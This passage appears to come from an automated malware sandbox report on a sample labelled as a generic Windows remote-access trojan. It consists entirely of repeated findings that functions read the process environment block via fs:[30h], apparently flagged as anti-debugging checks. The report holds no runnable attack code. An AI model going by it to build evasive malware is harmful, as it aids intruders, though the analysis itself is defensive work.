                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF660 mov eax, dword ptr fs:[00000030h]0_2_022BF660
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF660 mov eax, dword ptr fs:[00000030h]0_2_022BF660
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0671 mov eax, dword ptr fs:[00000030h]0_2_022E0671
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0671 mov eax, dword ptr fs:[00000030h]0_2_022E0671
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD643 mov eax, dword ptr fs:[00000030h]0_2_022BD643
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD643 mov ecx, dword ptr fs:[00000030h]0_2_022BD643
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC652 mov eax, dword ptr fs:[00000030h]0_2_022DC652
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC652 mov eax, dword ptr fs:[00000030h]0_2_022DC652
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC652 mov eax, dword ptr fs:[00000030h]0_2_022DC652
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC652 mov eax, dword ptr fs:[00000030h]0_2_022DC652
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CD68E mov eax, dword ptr fs:[00000030h]0_2_022CD68E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B9682 mov eax, dword ptr fs:[00000030h]0_2_022B9682
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B9682 mov ecx, dword ptr fs:[00000030h]0_2_022B9682
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228B6E9 mov eax, dword ptr fs:[00000030h]0_2_0228B6E9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227D6FC mov eax, dword ptr fs:[00000030h]0_2_0227D6FC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D66F6 mov eax, dword ptr fs:[00000030h]0_2_022D66F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D66F6 mov eax, dword ptr fs:[00000030h]0_2_022D66F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A76DC mov eax, dword ptr fs:[00000030h]0_2_022A76DC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A76DC mov eax, dword ptr fs:[00000030h]0_2_022A76DC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD72F mov eax, dword ptr fs:[00000030h]0_2_022BD72F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD72F mov eax, dword ptr fs:[00000030h]0_2_022BD72F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DB736 mov eax, dword ptr fs:[00000030h]0_2_022DB736
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DB736 mov eax, dword ptr fs:[00000030h]0_2_022DB736
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C870E mov ecx, dword ptr fs:[00000030h]0_2_022C870E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B070E mov eax, dword ptr fs:[00000030h]0_2_022B070E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B070E mov eax, dword ptr fs:[00000030h]0_2_022B070E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B570E mov eax, dword ptr fs:[00000030h]0_2_022B570E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C476E mov eax, dword ptr fs:[00000030h]0_2_022C476E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C476E mov ecx, dword ptr fs:[00000030h]0_2_022C476E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D877F mov eax, dword ptr fs:[00000030h]0_2_022D877F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0747 mov eax, dword ptr fs:[00000030h]0_2_022E0747
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0747 mov eax, dword ptr fs:[00000030h]0_2_022E0747
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228C7A8 mov eax, dword ptr fs:[00000030h]0_2_0228C7A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA7A4 mov eax, dword ptr fs:[00000030h]0_2_022CA7A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AE783 mov eax, dword ptr fs:[00000030h]0_2_022AE783
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE7FE mov eax, dword ptr fs:[00000030h]0_2_022BE7FE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C97CE mov ecx, dword ptr fs:[00000030h]0_2_022C97CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CD7CE mov eax, dword ptr fs:[00000030h]0_2_022CD7CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DE7DE mov eax, dword ptr fs:[00000030h]0_2_022DE7DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DE7DE mov ecx, dword ptr fs:[00000030h]0_2_022DE7DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B142E mov eax, dword ptr fs:[00000030h]0_2_022B142E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD42E mov eax, dword ptr fs:[00000030h]0_2_022BD42E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A443F mov eax, dword ptr fs:[00000030h]0_2_022A443F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A443F mov eax, dword ptr fs:[00000030h]0_2_022A443F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A443F mov eax, dword ptr fs:[00000030h]0_2_022A443F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A443F mov eax, dword ptr fs:[00000030h]0_2_022A443F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A443F mov eax, dword ptr fs:[00000030h]0_2_022A443F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD468 mov eax, dword ptr fs:[00000030h]0_2_022BD468
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229F44E mov eax, dword ptr fs:[00000030h]0_2_0229F44E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CD45E mov eax, dword ptr fs:[00000030h]0_2_022CD45E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA4BE mov eax, dword ptr fs:[00000030h]0_2_022CA4BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA4BE mov eax, dword ptr fs:[00000030h]0_2_022CA4BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA4BE mov eax, dword ptr fs:[00000030h]0_2_022CA4BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA4BE mov eax, dword ptr fs:[00000030h]0_2_022CA4BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA4BE mov eax, dword ptr fs:[00000030h]0_2_022CA4BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B048E mov eax, dword ptr fs:[00000030h]0_2_022B048E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B048E mov eax, dword ptr fs:[00000030h]0_2_022B048E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B048E mov eax, dword ptr fs:[00000030h]0_2_022B048E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B048E mov eax, dword ptr fs:[00000030h]0_2_022B048E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D648A mov eax, dword ptr fs:[00000030h]0_2_022D648A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D648A mov eax, dword ptr fs:[00000030h]0_2_022D648A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF4FD mov eax, dword ptr fs:[00000030h]0_2_022BF4FD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022864CE mov eax, dword ptr fs:[00000030h]0_2_022864CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B14DE mov eax, dword ptr fs:[00000030h]0_2_022B14DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E04DB mov eax, dword ptr fs:[00000030h]0_2_022E04DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E04DB mov eax, dword ptr fs:[00000030h]0_2_022E04DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E04DB mov eax, dword ptr fs:[00000030h]0_2_022E04DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E04DB mov eax, dword ptr fs:[00000030h]0_2_022E04DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6538 mov eax, dword ptr fs:[00000030h]0_2_022D6538
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE57B mov eax, dword ptr fs:[00000030h]0_2_022BE57B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE57B mov eax, dword ptr fs:[00000030h]0_2_022BE57B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229E54E mov eax, dword ptr fs:[00000030h]0_2_0229E54E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229E54E mov ecx, dword ptr fs:[00000030h]0_2_0229E54E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229E54E mov eax, dword ptr fs:[00000030h]0_2_0229E54E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD5A4 mov eax, dword ptr fs:[00000030h]0_2_022BD5A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF582 mov eax, dword ptr fs:[00000030h]0_2_022BF582
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022845EE mov eax, dword ptr fs:[00000030h]0_2_022845EE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022845EE mov ecx, dword ptr fs:[00000030h]0_2_022845EE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DF5DD mov eax, dword ptr fs:[00000030h]0_2_022DF5DD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DF5DD mov eax, dword ptr fs:[00000030h]0_2_022DF5DD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DFA18 mov eax, dword ptr fs:[00000030h]0_2_022DFA18
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AEA6E mov eax, dword ptr fs:[00000030h]0_2_022AEA6E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AEA6E mov ecx, dword ptr fs:[00000030h]0_2_022AEA6E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D7A62 mov eax, dword ptr fs:[00000030h]0_2_022D7A62
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ADA7E mov eax, dword ptr fs:[00000030h]0_2_022ADA7E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ADA7E mov eax, dword ptr fs:[00000030h]0_2_022ADA7E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ADA7E mov eax, dword ptr fs:[00000030h]0_2_022ADA7E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C7A4E mov eax, dword ptr fs:[00000030h]0_2_022C7A4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C7A4E mov eax, dword ptr fs:[00000030h]0_2_022C7A4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D2A45 mov eax, dword ptr fs:[00000030h]0_2_022D2A45
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D2A45 mov ecx, dword ptr fs:[00000030h]0_2_022D2A45
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DAA5C mov eax, dword ptr fs:[00000030h]0_2_022DAA5C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCA55 mov eax, dword ptr fs:[00000030h]0_2_022DCA55
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFAEE mov eax, dword ptr fs:[00000030h]0_2_022BFAEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFAEE mov eax, dword ptr fs:[00000030h]0_2_022BFAEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229DAFE mov eax, dword ptr fs:[00000030h]0_2_0229DAFE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229DAFE mov ecx, dword ptr fs:[00000030h]0_2_0229DAFE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1ADE mov eax, dword ptr fs:[00000030h]0_2_022B1ADE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C8B2F mov eax, dword ptr fs:[00000030h]0_2_022C8B2F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C8B2F mov ecx, dword ptr fs:[00000030h]0_2_022C8B2F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A2B2E mov eax, dword ptr fs:[00000030h]0_2_022A2B2E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228CB25 mov eax, dword ptr fs:[00000030h]0_2_0228CB25
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228CB25 mov eax, dword ptr fs:[00000030h]0_2_0228CB25
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCB37 mov eax, dword ptr fs:[00000030h]0_2_022DCB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CBB37 mov eax, dword ptr fs:[00000030h]0_2_022CBB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CBB37 mov eax, dword ptr fs:[00000030h]0_2_022CBB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CBB37 mov eax, dword ptr fs:[00000030h]0_2_022CBB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CBB37 mov eax, dword ptr fs:[00000030h]0_2_022CBB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CBB37 mov ecx, dword ptr fs:[00000030h]0_2_022CBB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CDB0A mov eax, dword ptr fs:[00000030h]0_2_022CDB0A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DFB46 mov eax, dword ptr fs:[00000030h]0_2_022DFB46
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DFB46 mov eax, dword ptr fs:[00000030h]0_2_022DFB46
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A4BAD mov ecx, dword ptr fs:[00000030h]0_2_022A4BAD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A4BAD mov eax, dword ptr fs:[00000030h]0_2_022A4BAD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6BB1 mov eax, dword ptr fs:[00000030h]0_2_022D6BB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6BB1 mov eax, dword ptr fs:[00000030h]0_2_022D6BB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3B80 mov eax, dword ptr fs:[00000030h]0_2_022C3B80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3B80 mov eax, dword ptr fs:[00000030h]0_2_022C3B80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3B80 mov eax, dword ptr fs:[00000030h]0_2_022C3B80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABB86 mov eax, dword ptr fs:[00000030h]0_2_022ABB86
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABB86 mov eax, dword ptr fs:[00000030h]0_2_022ABB86
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABB86 mov eax, dword ptr fs:[00000030h]0_2_022ABB86
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABB86 mov eax, dword ptr fs:[00000030h]0_2_022ABB86
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFB9E mov eax, dword ptr fs:[00000030h]0_2_022BFB9E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFB9E mov eax, dword ptr fs:[00000030h]0_2_022BFB9E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1BE5 mov eax, dword ptr fs:[00000030h]0_2_022B1BE5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC83B mov eax, dword ptr fs:[00000030h]0_2_022AC83B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC83B mov eax, dword ptr fs:[00000030h]0_2_022AC83B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC83B mov ecx, dword ptr fs:[00000030h]0_2_022AC83B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C980E mov eax, dword ptr fs:[00000030h]0_2_022C980E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AD84E mov eax, dword ptr fs:[00000030h]0_2_022AD84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AD84E mov eax, dword ptr fs:[00000030h]0_2_022AD84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AD84E mov eax, dword ptr fs:[00000030h]0_2_022AD84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AD84E mov eax, dword ptr fs:[00000030h]0_2_022AD84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227D84E mov eax, dword ptr fs:[00000030h]0_2_0227D84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227D84E mov eax, dword ptr fs:[00000030h]0_2_0227D84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227D84E mov eax, dword ptr fs:[00000030h]0_2_0227D84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227D84E mov eax, dword ptr fs:[00000030h]0_2_0227D84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC8A4 mov eax, dword ptr fs:[00000030h]0_2_022DC8A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC8A4 mov eax, dword ptr fs:[00000030h]0_2_022DC8A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D38B3 mov eax, dword ptr fs:[00000030h]0_2_022D38B3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D38B3 mov eax, dword ptr fs:[00000030h]0_2_022D38B3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C989E mov ecx, dword ptr fs:[00000030h]0_2_022C989E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE8FE mov eax, dword ptr fs:[00000030h]0_2_022BE8FE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov ecx, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE93E mov eax, dword ptr fs:[00000030h]0_2_022BE93E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DD980 mov eax, dword ptr fs:[00000030h]0_2_022DD980
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E09C4 mov eax, dword ptr fs:[00000030h]0_2_022E09C4
